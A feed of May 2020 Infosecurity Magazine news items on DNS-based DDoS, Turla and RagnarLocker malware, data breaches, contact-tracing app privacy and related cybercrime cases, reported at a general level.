Cyber Risk News

DNS Traffic Analysis Detects Hidden DDoS Attacks

Info Security - Wed, 05/27/2020 - 10:03
DNS Traffic Analysis Detects Hidden DDoS Attacks

New research has found a measurable increase in DNS cache miss traffic levels, and a number of previously unknown DDoS events.

According to Farsight Security, analysis of DNS cache miss traffic levels over the two-month period of March-April 2020 revealed “a macroscopic phenomenon.” The analysis was done over 300 domains for leading travel and transportation, retail, streaming video, higher education and news and partisan opinion sites.

Using its DNSDB intelligence solution, Farsight said that it looked at daily DNS transactions for over 300 sites and when reviewing traffic for these sites, it looked at the DNS cache miss traffic for all hostnames under a given delegation point. This revealed some websites experiencing spikes in volume, which Farsight stated represent denial of service (DDoS) attack traffic reflexively targeting unrelated third-party sites.

It said at least two distinct reflective DDoS attack patterns took place among the studied sites: one pattern type which appeared to be purely associated with abusive DNS SOA (Start of Authority) queries, and a second pattern type which melds abusive DNS SOA queries with abusive DNS TXT queries for wildcarded SPF redirect records.

Also some sites experienced spikes in volume that were so large that the spikes caused most of the “normal variation” in traffic volume to “wash out” due to the dominance of the spike or spikes.

Dr. Paul Vixie, chairman, CEO and co-founder of Farsight Security, said whilst headlines focused on a virus pandemic, most of the DNS traffic related to those headlines will be due to fraudulent or criminal activity by those hoping to cash in on the public's attention. “Therefore, it is worth our time to study DNS traffic patterns during every global event, to characterize current abuses of the system and to predict future abuses,” he said.

Farsight also discovered a step up pattern in traffic, typically reflecting a four-to-seven-times increase in DNS cache miss traffic levels, across most or all verticals during the same period.

To reduce the risk of DDoS events, Farsight recommended that nameserver vendors ship their products with Response Rate Limiting (RRL) enabled by default. Farsight also recommended all authoritative name server operators confirm that their current configurations have RRL enabled. 

Categories: Cyber Risk News

Trump Election Tweet Labelled Fake News

Info Security - Wed, 05/27/2020 - 09:30
Trump Election Tweet Labelled Fake News

Donald Trump has decided to pick a fight with Twitter after one of his posts on the upcoming election was labelled misleading by the social media platform.

The original tweet claimed that Mail-In (postal) ballots during the November Presidential election would be “substantially fraudulent.”

The issue has become a partisan one of late, as Democrats push for voters to have the option of mailing in their votes to avoid the risk of COVID-19 infection at the polling booth. They claim that otherwise, millions of voters may be disenfranchised as they stay at home.

Many Republicans, including Trump, believe higher voter turnouts enabled by postal voting would give their opponents an advantage, as groups that would otherwise stay home are more likely to vote Democrat.

Twitter labelled Trump’s tweet with a clickable blue notification stating "get the facts about mail-in ballots," which takes them to a page debunking the false assertion that postal votes lead to election fraud.

Unsurprisingly, Trump hit back, branding Twitter’s response as stifling free speech and interfering in the 2020 election.

In fact, many commentators have argued that Twitter has been too easy on Trump in recent months and years, saying that his status and 80 million followers have given him carte blanche to say things that others would be blacklisted for.

Twitter’s decision can be seen in the context of its newly updated policy on misleading information. Because the propensity for harm was judged “moderate” in this case, the platform merely labelled Trump’s tweet, but if that rating is upped to “severe” then future posts could be removed.

Either way, the incident is likely to be just the first of many ahead of the election as Trump seeks to fire up his base with increasingly outlandish statements on social media.

Categories: Cyber Risk News

UK Public Backlash Could Scupper #COVID19 App

Info Security - Wed, 05/27/2020 - 08:30
UK Public Backlash Could Scupper #COVID19 App

The UK’s plans to ease its COVID-19 lockdown have been thrown into doubt after half the public said it does not trust the government to handle their data collected via a key contact tracing app.

The app is a crucial part of the best practice “test, track and trace” strategy being rolled out around the world to help businesses and society get back to normal after weeks of social distancing.

“The NHS COVID-19 app automates the process of contact tracing,” noted the NHS. “Its goal is to reduce the transmission of the virus by alerting people who may have been exposed to the infection so they can take action to protect themselves, the people they care about and the NHS.”

It’s currently being trialled on the Isle of Wight ahead of a slated June 1 launch nationwide.

However, in a new survey of 1000 UK adults, Anomali found that 48% do not trust the government to keep the data collected by the app safe. A further 43% said they were concerned it would give hackers an opportunity to send phishing emails and texts — something only 52% said they felt savvy enough to be able to spot.

“It’s tough to predict the increase in the volume of attacks we’ll see. However, we’re already seeing thousands of rogue and spoof COVID-19 domains being registered and used in attacks,” Anomali head of EMEA, Jamie Stone, explained.

“Global interest around the virus, and each nation’s track-and-trace apps, means that attackers will likely use many of these domains to host phishing attacks via both email and SMS. People using COVID tracking apps need to be extremely vigilant and aware, ensuring that they’ve installed official government apps and that they are interacting with authentic messages from the agencies.”

Respondents also raised concerns about government surveillance: a third (33%) claimed the app may be able to track their whereabouts and 36% said that it may allow the government to collect data on them.

Unlike many being developed across Europe and elsewhere, the NHS app is said not to rely on an API developed by Apple and Google’s which allows collected data to be stored on the user’s device.

Instead, it is centralized, although the NHS claimed that no personally identifiable data is collected, the app will conform to UK law, and that data “will only ever be used for NHS care, management, evaluation and research.”

For voluntary contact tracing apps like this one to make a meaningful contribution to “test, track and trace” they need to be downloaded and used by 80%+ of current smartphone users. That makes confidence in the government’s approach crucial.

Yet there is widespread suspicion of government surveillance and data misuse in the UK thanks to incidents like the Windrush scandal and 2016 legislation known as the Investigatory Powers Act, aka the Snooper’s Charter.

This has been compounded by recent events, in which the Prime Minister’s chief advisor, Dominic Cummings, was found to have driven over 250 miles during lockdown, breaking the guidelines he helped to draw up.

Categories: Cyber Risk News

Deputy Sheriff Admits Cyberstalking Massachusetts Tween

Info Security - Tue, 05/26/2020 - 17:55
Deputy Sheriff Admits Cyberstalking Massachusetts Tween

A former deputy sheriff has pleaded guilty to cyberstalking and sexually exploiting a teenage girl whom he met through playing Minecraft online. 

When 26-year-old Texan Pasquale T. Salas first encountered his victim in 2014, she was just 12 years old. 

Salas engineered a relationship with the child by sending her messages in private chat rooms. The former deputy sheriff with the Matagorda County Sheriff’s Office then systematically used Skype, Snapchat, and text messages to groom the little girl.

Authorities said that during their digital exchanges, Salas put repeated pressure on his tweenage victim to capture sexually explicit images of herself and send them to him. 

At his coercion, the victim sent hundreds of lewd videos and images of herself to Salas over a two-year period. Some of the images were sent as they communicated via Minecraft. 

In a sick attempt to make the exploitation appear like a genuine relationship, Salas sent his victim jewelry, Edible Arrangements, and iTunes gift cards and granted her access to his Amazon Prime account.

The exploited girl, who is from Worcester County, tried to break off contact with Salas in 2016. The self-confessed sexual predator responded by repeatedly threatening to send lewd images of the victim to her family and friends unless she kept communicating with him.

Salas used technology to control his victim. He manipulated her into granting him access to her Snapchat, then used a tracking option on the app to keep tabs on the girl's whereabouts. 

The girl was ordered to obey a list of rules written by Salas that dictated what she could wear and whom she could speak with. 

According to authorities, Salas threatened to harm the girl's sister if she disobeyed him. He also meted out punishments to his victim when she went against his wishes.

Salas told the girl, “You belong to me. You’re my property so I can treat you however I want, whenever I want.”

Authorities said a second female victim had been sexually exploited by Salas for four years. Victim number 2 was also aged 12 when she met Salas via Minecraft. 

Salas, who is in custody at the Donald W. Wyatt Detention Facility in Rhode Island, will be sentenced on September 3.

Categories: Cyber Risk News

International Plea for Governments to Protect Healthcare from Cyber-Attacks

Info Security - Tue, 05/26/2020 - 17:07
International Plea for Governments to Protect Healthcare from Cyber-Attacks

A plea from the Cyber Peace Institute for healthcare providers to be protected against cyber-threats has attracted international support.

Major players in cybersecurity, academics, and numerous political movers and shakers have backed the call for governments to work together "with civil society and the private sector" to defend hospital, healthcare, and medical research facilities from digital assaults. 

In a strongly worded plea published May 26, the Cyber Peace Institute asked governments to assert in unequivocal terms that the targeting of healthcare facilities by cyber-criminals is both "unlawful and unacceptable."

"We call on the world’s governments to take immediate and decisive action to stop all cyberattacks on hospitals, healthcare and medical research facilities, as well as on medical personnel and international public health organizations," wrote the CPI. "To this end, governments should work together, including at the United Nations, to reaffirm and recommit to international rules that prohibit such actions."

The CPI highlighted recent cyber-assaults against healthcare providers around the world, cynically timed to coincide with the outbreak of COVID-19 in nearly every corner of the planet. 

"Over the past weeks, we have witnessed attacks that have targeted medical facilities and organizations on the frontlines of the response to the COVID-19 pandemic," wrote CPI. 

"These actions have endangered human lives by impairing the ability of these critical institutions to function, slowing down the distribution of essential supplies and information, and disrupting the delivery of care to patients." 

While the rate of deaths caused by the novel coronavirus continues to fall in some countries, bringing hope that the pandemic is ebbing, the CPI's plea warns against complacency.

"With hundreds of thousands of people already perished and millions infected around the world, medical care is more important than ever," wrote the CPI. "This will not be the last health crisis."

Political bigwigs who have signed the Institute's rally call include former presidents of the Soviet Union, Uruguay, Brazil, Liberia, Chile, Swiss Confederation, Mexico, Colombia, Denmark, Poland, and Slovenia, as well as former US secretary of state Madeleine Albright.

Signatories from the cybersecurity industry include Kaspersky CEO Eugene Kaspersky, Microsoft president Brad Smith, and Trend Micro CEO Eva Chen.

Categories: Cyber Risk News

National Guard Helps Maryland with Cybersecurity

Info Security - Tue, 05/26/2020 - 16:12
National Guard Helps Maryland with Cybersecurity

The National Guard has been working to keep Maryland safe from cyber-attacks.

Maryland governor Larry Hogan called in the National Guard by executive order on March 12 to bolster the state's COVID-19 pandemic response. In addition to assisting the Old Line State with its coronavirus testing and screening program, the Guard has been helping out with cybersecurity assessments.

Baltimore, Maryland's largest city, was rocked by a catastrophic ransomware attack last year that prevented government officials from performing even basic tasks like sending an email. 

In an interview with Federal Computer Week, Colonel Reid Novotny, Maryland National Guard's joint staff (J6) lead for IT and cyber, said that surviving a major attack did not make Baltimore invulnerable to cyber-criminals. 

"During this crisis, we are in daily contact with them [in] an elevated status," said Novotny. “There have been ransomware attacks that have affected hospitals that are treating COVID patients."

Novotny wouldn't specify which hospitals had been targeted but said that attacks had been observed in Baltimore and Baltimore County.

"Yes, that stuff has actually happened, and the department of IT has responded back, and the Guard has supported that response," he said.

"Patients and the residents of that county that went to that hospital were assured that everyone was up and working."

The state's chief information security officer, Chip Stewart, said that malicious activity against Maryland had increased since the outbreak of COVID-19. 

"Maryland has noticed an increased frequency of attempted cyber-attacks as have many other states throughout the country, ranging from phishing emails to sophisticated attempts to bypass security measures," said Stewart.

To counter the threats, Maryland has established a security operations center to monitor attacks on its digital infrastructure.

According to Stewart, the National Guard is supporting the state's efforts to thwart cyber-attackers by performing "routine external assessments of the state's websites and networks to identify issues proactively."

As of May 15, the Maryland National Guard has supplied over 3,000 hours of support to four different state agencies across four of Maryland's counties. Novotny said the commercial value of the Guard's cyber-support was roughly $1m.

Categories: Cyber Risk News

New Version of Turla Malware Poses Threat to Governments

Info Security - Tue, 05/26/2020 - 14:20
New Version of Turla Malware Poses Threat to Governments

Details of a new version of the ComRAT backdoor, one of the oldest malware families run by the notorious cyber-espionage group Turla, have been outlined by ESET. The findings will be of particular concern for government agencies, such as militaries and diplomats, with this updated backdoor able to use Gmail web UI to receive commands and exfiltrate data to try and steal confidential documents.

The Turla group, also referred to as ‘Snake,’ has been operating for at least 10 years, primarily targeting governments across Europe, Central Asia and the Middle East. It has breached a number of major organizations including the US Department of Defense in 2008 and the Swiss defense company RUAG in 2014.

One method it uses to steal important information is the malicious backdoor, comRAT, which is believed to have been first released in 2007. “Based on the victimology and the other malware samples found on the same compromised machines, we believe that ComRAT is used exclusively by Turla,” noted Matthieu Faou, malware researcher at ESET.

ESET has found evidence the fourth version of the malware, which has attacked at least three government institutions since 2017, was still active in January 2020. The operators used public cloud services such as OneDrive and 4shared to exfiltrate data.

The new version uses a completely new code base and is far more complex than earlier incarnations. It can perform a number of new actions on compromised computers, such as executing additional programs and exfiltrating files, whilst having unique abilities to evade security software.

“This shows the level of sophistication of this group and its intention to stay on the same machines for a long time,” explained Faou. “Additionally, the latest version of the ComRAT malware family, thanks to its use of the Gmail web interface, is able to bypass some security controls because it doesn’t rely on any malicious domain.”

Categories: Cyber Risk News

Customized Android Builds Drive Global Security Inequality

Info Security - Tue, 05/26/2020 - 10:45
Customized Android Builds Drive Global Security Inequality

Security experts have warned that default regional settings and pre-loaded applications may be exposing Android devices in some countries to a greater risk of cyber-attack.

F-Secure claimed today that large numbers of pre-bundled apps can expand the attack surface of a device.

The impact is potentially worse when country-specific rules block access to Google Play, meaning that users have to rely on third-party stores curated by the phone manufacturers themselves.

F-Secure claimed it found multiple vulnerabilities in the Huawei AppGallery which could be used to “create a beachhead” to launch additional attacks, such as one targeting the Huawei iReader which could allow hackers to execute code and steal data from devices.

Meanwhile, a simple phishing email/message could be enough to compromise the default configuration on the Xiaomi Mi 9 for China, India, Russia and maybe other countries, the security vendor claimed.

In another case, the research team compromised a Samsung Galaxy S9 by exploiting the fact that the device changes its behavior according to which country issued the SIM inside it.

“To perform this attack, an adversary must manipulate an affected Galaxy S9 user into connecting to a Wi-Fi network under their control (such as by masquerading as free public Wi-Fi),” F-Secure explained.

“If the phone detects a Chinese SIM, the affected component accepts unencrypted updates, allowing an adversary to compromise the device with a man-in-the-middle attack. If successful, the attacker will have full control of the phone.

F-Secure warned that as the number of customized Android builds grows, the white hat community needs to double down on research.

“It’s important for vendors to consider the security implications when they’re customizing Android for different regions,” added senior security consultant, Toby Drew.

“People in one region aren’t more or less entitled to security than another, and if you have the same device configured to provide a less secure experience to users in one region compared to another, it’s creating a type of inequality by increasing their exposure to attacks.”

Categories: Cyber Risk News

Data on 29 Million Indian Jobseekers Leaked

Info Security - Tue, 05/26/2020 - 09:29
Data on 29 Million Indian Jobseekers Leaked

The personal details of over 29 million Indian jobseekers have been posted to a dark web site, free for anyone to access.

Cybersecurity firm Cyble, which discovered the trove on an unnamed hacking forum, has in turn added the compromised information to its breach notification site AmIBreached.

It claimed to have found the posting during a regular sweep of the dark and deep web. The 2.3GB file includes email, phone, home address, qualification, work experience, current salary, employer and other details on job-hunters from all over India.

“Cyber-criminals are always on the lookout for such personal information to conduct various nefarious activities such as identity thefts, scams and corporate espionage,” said Cyble.

The vendor claimed that the leak had originated from a CV aggregation service which collected the data from legitimate job portal sites. An update over the weekend clarified that the data may have been initially exposed by an unprotected Elasticsearch instance, subsequently made inaccessible.

It continues to investigate these claims.

In the meantime, it spotted another threat actor posting nearly 2000 Aadhar identity cards for free onto a hacking forum. They appear to originate from Madhya Pradesh state.

Also over the weekend, Cyble claimed that three hacking forums have themselves been breached, exposing user details and private chats.

The firm said it had been able to obtain databases related to Sinful Site, SUXX.TO and Nulled.

“All these hacking forums are based on general discussion and sharing of related resources. It is a place where users can find lots of great data leaks, hacking and cracking tools, software, tutorials, and much more. Along with that, over here the users can also take part in active discussions and make new friends,” it explained.

Specifically, the firm now has detailed info on users of SUXX.TO and Nulled, which were dumped on May 20, and private messages from Sinful Site, which were leaked on May 15.

Categories: Cyber Risk News

Lawyers Aim £18bn Class Action Suit at easyJet

Info Security - Tue, 05/26/2020 - 08:37
Lawyers Aim £18bn Class Action Suit at easyJet

A specialist in group litigation has filed a potential £18bn class action claim against easyJet in London’s High Court, following the firm’s major data breach disclosure last week.

International law firm PGMBM said it had been contacted by “numerous affected people” and is urging more to come forward to join the case, which would pay out £2000 per impacted customer. 

It clarified that Article 82 of EU General Data Protection Regulation (GDPR) grants customers the right to compensation for inconvenience, distress, annoyance and loss of control of their personal data.

The Luton-headquartered airline revealed last week that a “highly sophisticated” attack on its IT infrastructure had compromised email addresses and travel details of nine million passengers, as well as the credit card details of just over 2200.

Despite claiming that it had no evidence that any of the stolen info had been misused, the airline warned those affected about follow-on phishing attacks.

Although it notified UK regulator the Information Commissioner’s Office (ICO) back in January, at around the time of the incident, it took several months for the firm to come clean to customers.

PGMBM has also claimed that the exposure of customers’ travel plans could pose security risks to those individuals, as well as being a gross invasion of privacy.

“This is a monumental data breach and a terrible failure of responsibility that has a serious impact on easyJet’s customers,” argued managing partner, Tom Goodhead.

“This is personal information that we trust companies with, and customers rightly expect that every effort is made to protect their privacy. Unfortunately, easyJet has leaked sensitive personal information of nine million customers from all around of the world.”

The case highlights the potentially serious financial repercussions of a major data breach, on top of the large fines GDPR regulators can theoretically impose.

The ICO has come in for some criticism recently after reports emerged that it may be considering a significantly lower fine than the £183.4m figure posted in a notice of intent last summer, in response to a major breach at British Airways.

Categories: Cyber Risk News

Mumbai Police Force Uses 'The Force' for Cyber-Safety Campaign

Info Security - Fri, 05/22/2020 - 16:19
Mumbai Police Force Uses 'The Force' for Cyber-Safety Campaign

Police in Mumbai have recruited Baby Yoda to help raise awareness of the importance of cyber-safety. 

The law enforcement agency has earned a reputation online for delivering serious messages with humorous memes via social media app Instagram. It only seems appropriate that the force should use the power of 'The Force' to drive home a warning that passwords should be kept private.

On Monday, Mumbai Police shared an image of a popular meme that uses characters from TV space Western series Star Wars: The Mandalorian. In the meme, the show's lone gun fighter shares an amusing exchange with the famous character Baby Yoda.

The meme shows the fighter telling Baby Yoda to close his eyes, after which he asks him, "What do you see, bro?"

Yoda shutters his peepers and replies, "Nothing, bro."

In an amusing edit to the next line of dialogue, Mumbai Police tweaked the meme so that the fighter tells Yoda: "That's your bank balance after you shared your password with me, bro."

Along with the meme, Mumbai Police share the following caption with their 126K Instagram followers: "Share password, do not. There is no question of do."

The funny post was a hit with netizens who expressed their appreciation by filling the comments section with compliments. 

Instagram user rohitksp wrote, "Mumbai police is getting cooler day by day," while user tanabhy punned, "Mumbai police, Yoda best."

User dandekarvaibhav added: "Mumbai Police shared a Star Wars themed meme... My day is made."

User uppalakshit took the joke one step further, quipping, "That's the Bank balance during Lockdown..."

Not every heart was won by the force's attempt to raise awareness of cybersecurity in a humorous way. One user expressed the view that Mumbai police ought to be focusing their resources elsewhere. 

User ashwitha4real wrote in the comments: "Memes are great but there are groups on telegram that are sexually assaulting women, making videos and sharing it. Kindly do something about it."

At time of publication, the Baby Yoda post had garnered 23,291 likes on Instagram and attracted 209 comments.

Categories: Cyber Risk News

North Dakota's Contact Tracing App Sends User Data to Third Parties

Info Security - Fri, 05/22/2020 - 15:14
North Dakota's Contact Tracing App Sends User Data to Third Parties

A cybersecurity company has claimed that a contact tracing app introduced by North Dakota is sending data to third parties and exposing users' identities.

Like South Dakota and Utah, North Dakota has built its own contact-tracing app, Care19, in an effort to monitor the spread of the novel coronavirus.

Jumbo Privacy alleges that the Care19 app, created by ProudCrowd LLC to track the spread of COVID-19 in The Peace Garden State, is sharing user data with Foursquare and other third-party services.

Foursquare is a location service that provides advertisers with tools to reach audiences who have been at specific locations.

Users of the Care19 app are told in the privacy policy that their "location data is private to you and is stored securely on ProudCrowd, LLC servers. It will not be shared with anyone including government entities or third parties, unless you consent or ProudCrowd is compelled under federal regulations.”

North Dakota claims that users of the app cannot be individually identified. On the state's website in the app FAQ section it states that “the application does not have any information that is tied to an individual person” and information uploaded via the app is "100% anonymous." 

Jumbo disputes this assertion, claiming instead that users accessing the app via the iOS on their iPhone can be unmasked through the Identifier for Advertisers (IDFA) on their device. 

The IFDA is an ad-tracking device that enables an advertiser to understand when a phone user has taken an action like a click or an app install.

"They share the IDFA with Foursquare, which means it’s not anonymous,” said Jumbo Privacy CEO Pierre Valade. "It’s a unique ID tied to your phone.”

Foursquare confirmed in a statement that it receives Care19 data. However, the company said it promptly discards the information sent via the app and doesn't use it for anything. 

The Care19 privacy policy indicates that “Your data is identified by an anonymous code.” Jumbo found that, along with the IDFA, this anonymous code was transmitted to Foursquare. The code was also being sent, together with the name given to the phone by the user (e.g., Paul's phone), to remote logger Bugfender.

Categories: Cyber Risk News

Businesses Could Face Influx of Attacks When Offices Reopen

Info Security - Fri, 05/22/2020 - 15:00
Businesses Could Face Influx of Attacks When Offices Reopen

Cyber-criminals could be poised to trigger a wave of attacks on businesses when workers return to offices and reconnect to corporate networks, Redscan has warned. As many countries such as the UK prepare to ease COVID-19 lockdown restrictions and allow more people to return to physical workplaces, the cybersecurity firm said organizations need to take action to defend themselves against potential hackers lying dormant on employee devices.

There has been a substantial rise in threat activity over recent months, with cyber-criminals looking to exploit the sudden rise in remote working during the pandemic and the resultant lack of protection. In this period, Redscan has observed a surge in activity such as malspam, external scanning attempts to identify weaknesses in the use of remote access tools and account login attempts from unknown locations.

It therefore believes there could be an influx of attacks when staff reconnect to company networks after returning to their workplaces, with attackers ready to launch attacks including ransomware across a company network. In order to prevent this situation occurring, Redscan said firms should sanitize all endpoints on the return to the office as well as closely monitor networks for evidence of compromises.

George Glass, head of threat intelligence at Redscan, said: “During the COVID-19 pandemic there has been a steady stream of organizations reporting cyber-attacks. However, this is only likely to be the tip of the iceberg. Many more organizations are certain to have been targeted without their knowledge.

“As employees return to work post-lockdown and connect directly to corporate networks, organizations need to be alert to the possibility that criminals could be lying dormant on employee devices, waiting for the opportunity to move laterally through a network, escalate privileges and deploy ransomware.”

Redscan provided other recommendations to companies to tackle this type of threat, including updating anti-virus signatures, connecting all devices to remote networks and educating staff about the latest risks.

Categories: Cyber Risk News

Data Breach Afflicts Ohio’s Unemployment Office

Info Security - Fri, 05/22/2020 - 14:29
Data Breach Afflicts Ohio’s Unemployment Office

A data breach at the Ohio Department of Job and Family Services (ODJFS) has exposed the personal data of Pandemic Unemployment Assistance (PUA) claimants. 

Personal information including names, Social Security numbers, home addresses, and claim receipts was exposed to other claimants due to a security vulnerability detected by Deloitte Consulting on May 15. Deloitte is the technology vendor for PUA systems in several states, including Ohio. 

“A unique circumstance enabled about two dozen Pandemic Unemployment Assistance claimants to inadvertently access a restricted page when logged into the state’s PUA website,” Deloitte said in the statement.

In a breach notification email sent to PUA claimants on May 20, ODJFS said the breach was fixed within one hour of discovery. 

The department stated: “Over the weekend, Deloitte notified ODJFS that about two dozen individuals inadvertently had the capability to view other PUA claimants’ correspondence.” 

According to the department there is no evidence to suggest that any "widespread data compromise" had occurred. 

More than 161,000 Ohioans have applied for unemployment assistance offered in the wake of COVID-19. ODJFS has not revealed how many of these claimants were affected by the data breach. 

Perhaps tellingly, every single Ohioan who has claimed PUA is being offered free credit monitoring by Deloitte Consulting for 12 months.

“A unique circumstance enabled about two dozen Pandemic Unemployment Assistance claimants to inadvertently access a restricted page when logged into the state’s PUA website,” Deloitte said in the statement. "Within an hour of learning of this issue, we identified the cause and stopped the unauthorized access to prevent additional occurrences.

Frustrated claimants, some of whom are still waiting to receive financial assistance under the PUA program, reported the breach on social media. 

ODJFS said action had been taken to ensure that the data breach was a one-off.

The department stated: “ODJFS holds the confidentiality of claimant data in the highest regard and agreed with the immediate steps Deloitte took to prevent any unauthorized PUA access in the future."

Unemployment claims in Ohio since the start of the coronavirus crisis passed the 1 million mark at the end of April, putting pressure on an archaic system.

Categories: Cyber Risk News

Non-Cybersecurity Incidents Outnumber Cyber-Attacks in ICO Report

Info Security - Fri, 05/22/2020 - 11:15
Non-Cybersecurity Incidents Outnumber Cyber-Attacks in ICO Report

The Information Commissioner’s Office (ICO) has disclosed that reported non-cyber incidents outweighed cyber-incidents in Q4 of 2019.

In its report on incident trends, the ICO said there were 2629 incidents reported to it in Q4 2019, of which 337 were due to “data emailed to incorrect recipient,” 265 were due to “data posted or faxed to incorrect recipient” and 213 due to “loss/theft of paperwork or data left in insecure location.” Meanwhile, the main cyber-incidents were 280 as a result of phishing and 175 regarding unauthorized access. 

As a result, the ICO issued two fines. The first was £500,000 to DSG Retail Limited in January after a point of sale computer system was compromised as a result of a cyber-attack, affecting at least 14 million people. Also, in March, the ICO fined Cathay Pacific Airways Limited £500,000 for failing to protect the security of its customers’ personal data. Between October 2014 and May 2018 Cathay Pacific’s computer systems lacked appropriate security measures which led to customers’ personal details being exposed.

ZIVVER’s CEO and founder Rick Goud pointed out the number of reported data leaks decreases every quarter in the UK, while other countries like Germany, the Netherlands, Denmark and Sweden have shown more than 50% increases. “Per inhabitant, the UK was already reporting about 10-times less data leaks than the 'top'-countries,” he said. “This is not due to less data leaks, but – instead – due to a decrease in reporting culture, possibly prompted by the lack of action shown by the ICO since GDPR came into force.”

In an email to Infosecurity, BH Consulting CEO Brian Honan said the report reinforces the fact that most security breaches are not due to “sophisticated attackers” but are the result of failings in basic security controls.

He added: “Accidental data leakage is one of the key sources for breaches and these can result from the lack of appropriate training to staff on how to handle and process data, from weak security controls that don’t prevent or alert to breaches, or a combination of both.

“Ensuring staff are properly trained in the handling and processing of personal data, the technologies they use as part of their daily work and have effective security awareness training is crucial to preventing these type of errors.”

Honan also pointed out that the blame cannot be solely put down to human error, and we need to ensure our systems and platforms provide staff with a safety net in the event they make a mistake. “This means security professionals also need to ensure the basics are covered and that systems are properly patched, effective email security to protect against phishing attacks and data leakage are in place, and that data is encrypted at rest and in transit,” he said.

“It is also important to remember that no matter what controls are in place a breach can still happen and that staff and the company need to be prepared on how to deal with it and know when and how to report breaches to the ICO, or any other relevant Data Protection Supervisory Authorities or other regulatory bodies.”

Categories: Cyber Risk News

RagnarLocker Ransomware Hides in Virtual Machine to Escape Detection

Info Security - Fri, 05/22/2020 - 10:45
RagnarLocker Ransomware Hides in Virtual Machine to Escape Detection

Security researchers are warning of a new ransomware attack technique which deploys the malware as a virtual machine (VM) in order to evade traditional defenses.

Sophos revealed that it recently detected a RagnarLocker attack in which the ransomware was hidden inside an Oracle VirtualBox Windows XP VM.

It said the attack payload was a 122MB installer, with a 282MB virtual image inside concealing a 49KB executable.

“In the detected attack, the Ragnar Locker actors used a GPO task to execute Microsoft Installer (msiexec.exe), passing parameters to download and silently install a 122 MB crafted, unsigned MSI package from a remote web server,” Sophos director of engineering, Mark Loman, explained.

The MSI package contained an Oracle VirtualBox hypervisor and a virtual disk image file (VDI) named micro.vdi, which was an image of a stripped-down version of the Windows XP SP3 operating system.

“Since the vrun.exe ransomware application runs inside the virtual guest machine, its process and behaviors can run unhindered, because they’re out of reach for security software on the physical host machine,” said Loman.

The attack appears to have been highly targeted, as the ransom note contained the victim’s name.

RagnarLocker has been in action recently, after it was deployed against Portuguese energy giant Energias de Portugal (EDP) group in an attack demanding a payment of €10m ($11m).

As Loman explained, the group behind the ransomware typically targets managed service providers (MSPs) and exploits holes in Windows Remote Desktop Protocol (RDP) to gain a foothold into organizations.

“After gaining administrator-level access to the domain of a target and exfiltration of data, they have used native Windows administrative tools such as Powershell and Windows Group Policy Objects (GPOs) to move laterally across the network to Windows clients and servers,” he said.

Categories: Cyber Risk News

Japan Probes Theft of Hypersonic Missile Plans – Report

Info Security - Fri, 05/22/2020 - 09:10
Japan Probes Theft of Hypersonic Missile Plans – Report

The Japanese government is investigating a potentially serious breach of national security after a cyber-attack on Mitsubishi Electric earlier this year which may have yielded top secret missile plans.

The tech giant said in a statement earlier this week that it reported an incident to the Defense Ministry in February, in which sensitive information including personal data on 8000 employees may have been stolen, according to AP.

Chief cabinet secretary Yoshihide Suga is said to have told reporters that the government is now investigating “the possible impact of the information leak on national security.”

The stolen data is thought to relate to a prototype missile that Mitsubishi was bidding to build. The firm didn’t win the bid but held sensitive documents related to the design as part of the process.

Russia, the US and China appear to be in an arms race to build these hypersonic glide vehicles (HGVs), which are said to combine the speed of a ballistic missile with the maneuvering capabilities of a cruise missile, making them incredibly difficult for conventional defense systems to track.

Given that the missiles were apparently intended to be deployed in Japan’s southern islands to ward of the threat from an increasingly assertive China, it would seem that Beijing-backed hackers are likely to be behind these latest cyber-espionage efforts.

It’s unclear whether the reported incident relates to one revealed by Mitsubishi Electric in January, which took place back in June 2019.

At the time reports suggested likely Chinese hackers had stolen 200MB of data from the firm.

However, Mitsubishi claimed that, although personal and corporate confidential information may have been taken, “sensitive information on social infrastructure such as defense, electric power and railways, highly confidential technical information, and important information concerning business partners has not been leaked."

Categories: Cyber Risk News

Wishbone Breach: 40 Million Records Leaked on Dark Web

Info Security - Fri, 05/22/2020 - 08:15
Wishbone Breach: 40 Million Records Leaked on Dark Web

A prolific dark web trader has leaked what they claim to be 40 million user records from popular mobile app Wishbone.

The individual known as “ShinyHunters” posted the data to RaidForums, claiming that, “since people are starting to resell wishbone we’ve decided to leak it for free.”

The post was shared by security vendor Cyble and indicates ongoing tension in the cybercrime community. Previously, the database was thought to be selling on the dark web for thousands of dollars.

ShinyHunters has been linked to multiple previous sales of breached data including Home Chef, which this week revealed that it had suffered a serious cybersecurity incident thought to have affected millions of customers.

Popular with youngsters, Wishbone is an iOS and Android app which allows users to “compare anything.”

The trove of data now available to all-comers includes usernames, email addresses, mobile numbers, gender, date-of-birth, Facebook and Twitter access tokens, MD5-hashed passwords and more.

This could provide fraudsters with plenty of information to carry out follow-on phishing attacks, credential stuffing and more.

Trevor Morgan, product manager at comforte AG, argued that tokenizing or securely encrypting the data could have helped Wishbone mitigate the impact of the breach.

“Unfortunately, in this case the stolen passwords were in MD5 format, a weak form of password hashing which can be decoded by malicious actors and therefore monetized through sale on hacking forums,” he explained.

“Encrypted or tokenized data, however, could not be listed for sale on the dark web because it becomes undecipherable without the necessary key, therefore reducing the likelihood of data exposure during a breach, and maintaining the security of valuable personal information.

He urged organizations to rethink their security and data protection processes or risk becoming the next Wishbone.

This isn’t the first time Wishbone has been caught out. A 2016 breach affected 9.4 million records with 2.2 million unique email addresses, according to HaveIBeenPwned.

Categories: Cyber Risk News

Zoom Meetings Bombed with Child Sexual Abuse Material

Info Security - Thu, 05/21/2020 - 18:20
Zoom Meetings Bombed with Child Sexual Abuse Material

The disruption of nearly 200 Zoom meetings with images of child sexual abuse has prompted the FBI to issue a warning.

In recent months, schools, councils, businesses, and the general public have been using the videoconferencing app to communicate after social distancing and lockdown measures introduced to slow the spread of COVID-19 made face-to-face interaction difficult.  

However, as the number of legitimate users has risen, so too has the number of Zoom-bombing incidents in which malicious users hack meetings to subject attendees to unwanted language and images. 

While some Zoom-bombings consist of little more than a schoolboy prank, others are seriously offensive, featuring lewd imagery, expletives, and racist language. According to the FBI, a growing number of these cyber-attacks now feature material depicting the sexual abuse of minors. 

"During the last few months, the FBI has received more than 195 reports of incidents throughout the United States and in other countries in which a Zoom participant was able to broadcast a video depicting child sexual abuse material (CSAM)," wrote the FBI in a statement released yesterday.

"The FBI considers this activity to be a violent crime, as every time child sexual abuse material is viewed, the depicted child is re-victimized. Furthermore, anyone who inadvertently sees child sexual abuse material depicted during a virtual event is potentially a victim as well."

The Bureau asked any Zoom hosts or administrators who have had a meeting disrupted by the broadcast of CSAM to contact the FBI and to keep a record of what occurred. 

